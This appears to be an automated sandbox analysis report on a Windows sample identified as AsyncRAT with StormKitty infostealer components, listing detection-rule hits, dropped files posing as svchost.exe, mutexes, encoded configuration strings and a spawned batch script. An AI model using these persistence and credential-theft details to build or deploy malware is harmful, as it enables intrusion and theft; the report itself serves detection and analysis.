                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2919350933.000000000339B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000008.00000002.1804100868.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: svchost.exe PID: 3620, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.csCryptographic APIs: 'CreateDecryptor'
                    Source: zrrHgsDzgS.exe, zDYbkLNeWL.csBase64 encoded string: '/IjSTxAoXEwHFwMyIyDJzNq/Ezvghhl91HD6vZHmtIzEHBOWOXCz6xkRiIG1eF4z/LtFu23Jpa0QIJ1Sf+Ax0hxjVI45V40Z5ERnm3EIUfs=', 'NzkoLGAd20B2wXfQzAKwlaOLNPCzneCrBftsGZdPDLaYelbMv031cBcxd14pMOnvV95C1m4v/fgxOfjpRMmGGw==', 'TbqlEMt6xp6EvJSLjoVPacxdEUptA0/IPDWIfUFw+GnaC2jpi2mS1WiMlA6JFCgjtVkc31bMGU2WPDAIYQ03zw==', 'MpGamIIT8S0/ugO62ZLVZ2k/q/04Nez649CEibF88AJwWcFzjqxqveHd6jw/B0LKic3dSndBegRLkk8Be2aL5nVb0d10iX1keppwn6lC/ohVLnUkgqqAF/em5PaYMoRr+neIZG4+DiYhUFL8x9MH1nW9rxkOqI4lvRqWR5AMukx0/D7g/+lsnmxyeNOqBPkZ3ks/TqwSjgn63FIQgYJylR3Fa7ED4zFW99KDUuEjFw0qPz1R7acI046HyTjl4aUiFhkfukCznq2p/2F42Tx+wbRfMirQj4AIcgJora7ODTBe4J1rVtpWsn07+cLvtBTfBdA4gmexUw2lnSPe2qadbnNX/8xcn2CCBSIqc4OPWMOyAHVEY6RJ2OpsBbOicmbaZlbT5J0LF8xX1oG3rL6Tk+Lu22GpKe2vTJw2loXKJ6pGavU/d8eqH3zqF2Mi1/sdxcPrJISgsDMm9/rVNOUTghTNXbBZEabvWisCH8vErog1xFXFIejPRl9S0KMtQTkEWIGkPNAjXcE+07+XsL85FMzk6hN1diUYVhoL3g+PZo0Sk8mGjn5snI81EqZBkjP3hQbrK/GEducBTtyNPp3dgQwmFEhRQGhUHMMqeFPLURn4rIzlq54YiMyCf8rh84vPfrOG9hQftosAzYF7a6TIzPbIXlTW47/th4J4lp6H/MKT3gW/ifZ16hAuBuFqzOOPNF9Hih1O5qXyTCjj1+/2gDPwx5ctDFWLdCrileQqKoC7IUyIPnFckdIwpGUEAbmDoT01Sh2Pxtfio4i2DsjQ+hQLRRxCJWjazZILHYGCxSbW+LuM/K0hXf4PVlX+xT3/6LCDgZKMK1OwGjuJyikDtfxEGS4i8GcV038SQVngj7NGoM+Psu9UKd0NA3ao1YLoBbm5JEMgFL8ncNhsA7DtNvEieaE1OCnSlpbnmlRHE441nfn0vPsVmjLiaDa64wAZM69eVXE5mtHxAF0xyEsqQQ==', 'WYielA5EPy+ENvVfTl39vkuykxCuYTfE2wrLRHFgtq3DOSPQIQBVxdONamdr7Bt4ZLDAhnsYHZ51Bhpo317tvA==', 'Plb0n43ZfBgoATXvFasPWzCe/qpWQlDVS3WiSqSF7BcxkSdaIDFj+N0c39kriaMWfVGZht2J5j76yQWAMP0R2Q==', 'vPZhwp+GIzTgxRJZLlD3Q0Y+p12aM99reTOBWPGPYnIUSQ5lRZIw8+LOYFFI+QzucKBIdCcSV0fUrAcuCySfXw=='
                    Source: svchost.exe.0.dr, zDYbkLNeWL.csBase64 encoded string: '/IjSTxAoXEwHFwMyIyDJzNq/Ezvghhl91HD6vZHmtIzEHBOWOXCz6xkRiIG1eF4z/LtFu23Jpa0QIJ1Sf+Ax0hxjVI45V40Z5ERnm3EIUfs=', 'NzkoLGAd20B2wXfQzAKwlaOLNPCzneCrBftsGZdPDLaYelbMv031cBcxd14pMOnvV95C1m4v/fgxOfjpRMmGGw==', 'TbqlEMt6xp6EvJSLjoVPacxdEUptA0/IPDWIfUFw+GnaC2jpi2mS1WiMlA6JFCgjtVkc31bMGU2WPDAIYQ03zw==', 'MpGamIIT8S0/ugO62ZLVZ2k/q/04Nez649CEibF88AJwWcFzjqxqveHd6jw/B0LKic3dSndBegRLkk8Be2aL5nVb0d10iX1keppwn6lC/ohVLnUkgqqAF/em5PaYMoRr+neIZG4+DiYhUFL8x9MH1nW9rxkOqI4lvRqWR5AMukx0/D7g/+lsnmxyeNOqBPkZ3ks/TqwSjgn63FIQgYJylR3Fa7ED4zFW99KDUuEjFw0qPz1R7acI046HyTjl4aUiFhkfukCznq2p/2F42Tx+wbRfMirQj4AIcgJora7ODTBe4J1rVtpWsn07+cLvtBTfBdA4gmexUw2lnSPe2qadbnNX/8xcn2CCBSIqc4OPWMOyAHVEY6RJ2OpsBbOicmbaZlbT5J0LF8xX1oG3rL6Tk+Lu22GpKe2vTJw2loXKJ6pGavU/d8eqH3zqF2Mi1/sdxcPrJISgsDMm9/rVNOUTghTNXbBZEabvWisCH8vErog1xFXFIejPRl9S0KMtQTkEWIGkPNAjXcE+07+XsL85FMzk6hN1diUYVhoL3g+PZo0Sk8mGjn5snI81EqZBkjP3hQbrK/GEducBTtyNPp3dgQwmFEhRQGhUHMMqeFPLURn4rIzlq54YiMyCf8rh84vPfrOG9hQftosAzYF7a6TIzPbIXlTW47/th4J4lp6H/MKT3gW/ifZ16hAuBuFqzOOPNF9Hih1O5qXyTCjj1+/2gDPwx5ctDFWLdCrileQqKoC7IUyIPnFckdIwpGUEAbmDoT01Sh2Pxtfio4i2DsjQ+hQLRRxCJWjazZILHYGCxSbW+LuM/K0hXf4PVlX+xT3/6LCDgZKMK1OwGjuJyikDtfxEGS4i8GcV038SQVngj7NGoM+Psu9UKd0NA3ao1YLoBbm5JEMgFL8ncNhsA7DtNvEieaE1OCnSlpbnmlRHE441nfn0vPsVmjLiaDa64wAZM69eVXE5mtHxAF0xyEsqQQ==', 'WYielA5EPy+ENvVfTl39vkuykxCuYTfE2wrLRHFgtq3DOSPQIQBVxdONamdr7Bt4ZLDAhnsYHZ51Bhpo317tvA==', 'Plb0n43ZfBgoATXvFasPWzCe/qpWQlDVS3WiSqSF7BcxkSdaIDFj+N0c39kriaMWfVGZht2J5j76yQWAMP0R2Q==', 'vPZhwp+GIzTgxRJZLlD3Q0Y+p12aM99reTOBWPGPYnIUSQ5lRZIw8+LOYFFI+QzucKBIdCcSV0fUrAcuCySfXw=='
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, zDYbkLNeWL.csBase64 encoded string: '/IjSTxAoXEwHFwMyIyDJzNq/Ezvghhl91HD6vZHmtIzEHBOWOXCz6xkRiIG1eF4z/LtFu23Jpa0QIJ1Sf+Ax0hxjVI45V40Z5ERnm3EIUfs=', 'NzkoLGAd20B2wXfQzAKwlaOLNPCzneCrBftsGZdPDLaYelbMv031cBcxd14pMOnvV95C1m4v/fgxOfjpRMmGGw==', 'TbqlEMt6xp6EvJSLjoVPacxdEUptA0/IPDWIfUFw+GnaC2jpi2mS1WiMlA6JFCgjtVkc31bMGU2WPDAIYQ03zw==', 'MpGamIIT8S0/ugO62ZLVZ2k/q/04Nez649CEibF88AJwWcFzjqxqveHd6jw/B0LKic3dSndBegRLkk8Be2aL5nVb0d10iX1keppwn6lC/ohVLnUkgqqAF/em5PaYMoRr+neIZG4+DiYhUFL8x9MH1nW9rxkOqI4lvRqWR5AMukx0/D7g/+lsnmxyeNOqBPkZ3ks/TqwSjgn63FIQgYJylR3Fa7ED4zFW99KDUuEjFw0qPz1R7acI046HyTjl4aUiFhkfukCznq2p/2F42Tx+wbRfMirQj4AIcgJora7ODTBe4J1rVtpWsn07+cLvtBTfBdA4gmexUw2lnSPe2qadbnNX/8xcn2CCBSIqc4OPWMOyAHVEY6RJ2OpsBbOicmbaZlbT5J0LF8xX1oG3rL6Tk+Lu22GpKe2vTJw2loXKJ6pGavU/d8eqH3zqF2Mi1/sdxcPrJISgsDMm9/rVNOUTghTNXbBZEabvWisCH8vErog1xFXFIejPRl9S0KMtQTkEWIGkPNAjXcE+07+XsL85FMzk6hN1diUYVhoL3g+PZo0Sk8mGjn5snI81EqZBkjP3hQbrK/GEducBTtyNPp3dgQwmFEhRQGhUHMMqeFPLURn4rIzlq54YiMyCf8rh84vPfrOG9hQftosAzYF7a6TIzPbIXlTW47/th4J4lp6H/MKT3gW/ifZ16hAuBuFqzOOPNF9Hih1O5qXyTCjj1+/2gDPwx5ctDFWLdCrileQqKoC7IUyIPnFckdIwpGUEAbmDoT01Sh2Pxtfio4i2DsjQ+hQLRRxCJWjazZILHYGCxSbW+LuM/K0hXf4PVlX+xT3/6LCDgZKMK1OwGjuJyikDtfxEGS4i8GcV038SQVngj7NGoM+Psu9UKd0NA3ao1YLoBbm5JEMgFL8ncNhsA7DtNvEieaE1OCnSlpbnmlRHE441nfn0vPsVmjLiaDa64wAZM69eVXE5mtHxAF0xyEsqQQ==', 'WYielA5EPy+ENvVfTl39vkuykxCuYTfE2wrLRHFgtq3DOSPQIQBVxdONamdr7Bt4ZLDAhnsYHZ51Bhpo317tvA==', 'Plb0n43ZfBgoATXvFasPWzCe/qpWQlDVS3WiSqSF7BcxkSdaIDFj+N0c39kriaMWfVGZht2J5j76yQWAMP0R2Q==', 'vPZhwp+GIzTgxRJZLlD3Q0Y+p12aM99reTOBWPGPYnIUSQ5lRZIw8+LOYFFI+QzucKBIdCcSV0fUrAcuCySfXw=='
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, jnRLUJegstsF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, jnRLUJegstsF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: svchost.exe.0.dr, jnRLUJegstsF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: svchost.exe.0.dr, jnRLUJegstsF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: zrrHgsDzgS.exe, jnRLUJegstsF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: zrrHgsDzgS.exe, jnRLUJegstsF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@60/232@7/6
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\o6tEeoRxJb0n
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF775.tmpJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
                    Source: zrrHgsDzgS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
